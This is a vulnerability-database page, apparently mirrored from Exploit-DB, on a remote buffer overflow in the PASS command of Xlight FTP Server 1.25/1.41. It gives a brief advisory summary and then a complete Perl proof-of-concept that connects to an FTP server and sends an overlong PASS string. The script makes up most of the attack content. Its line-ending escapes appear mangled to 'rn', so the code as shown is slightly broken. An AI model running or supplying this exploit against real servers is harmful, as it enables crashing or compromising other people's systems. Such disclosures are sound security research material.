Xlight FTP Server 1.25/1.41 – PASS Command Remote Buffer Overflow

Xlight FTP Server 1.25/1.41 – PASS Command Remote Buffer Overflow

漏洞ID 1054324 漏洞类型
发布时间 2003-12-23 更新时间 2003-12-23
图片[1]-Xlight FTP Server 1.25/1.41 – PASS Command Remote Buffer Overflow-安全小百科CVE编号 N/A
图片[2]-Xlight FTP Server 1.25/1.41 – PASS Command Remote Buffer Overflow-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23468
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9285/info

It has been reported that Xlight FTP Server is prone to a remote buffer overflow condition that may allow an attacker to gain unauthorized access to a system running the vulnerable software. The issue presents itself when an attacker sends a specially crafted PASS command request containing an excessively long string value to the vulnerable server.

Xlight FTP Server versions 1.41 and prior have been reported to be prone to this issue. 

#!/usr/bin/perl
 
# Exploit for Xlight FTP server long PASS vulnerability
 
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => "tcp",
                                 PeerAddr => $host,
                                 PeerPort => "ftp(21)",
                                 );
unless ($remote) { die "cannot connect to ftp daemon on $host" }

$remote->autoflush(1);

print $remote "USER anonymousrn";
sleep(1);

$buf = "A"x54; # Min 54, Max 523
print $remote "PASS ".$buf."rn";
sleep(1);

close $remote;

相关推荐: Cisco Discovery Protocol Neighbor Announcment Denial of Service Vulnerability

Cisco Discovery Protocol Neighbor Announcment Denial of Service Vulnerability 漏洞ID 1102906 漏洞类型 Failure to Handle Exceptional Cond…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享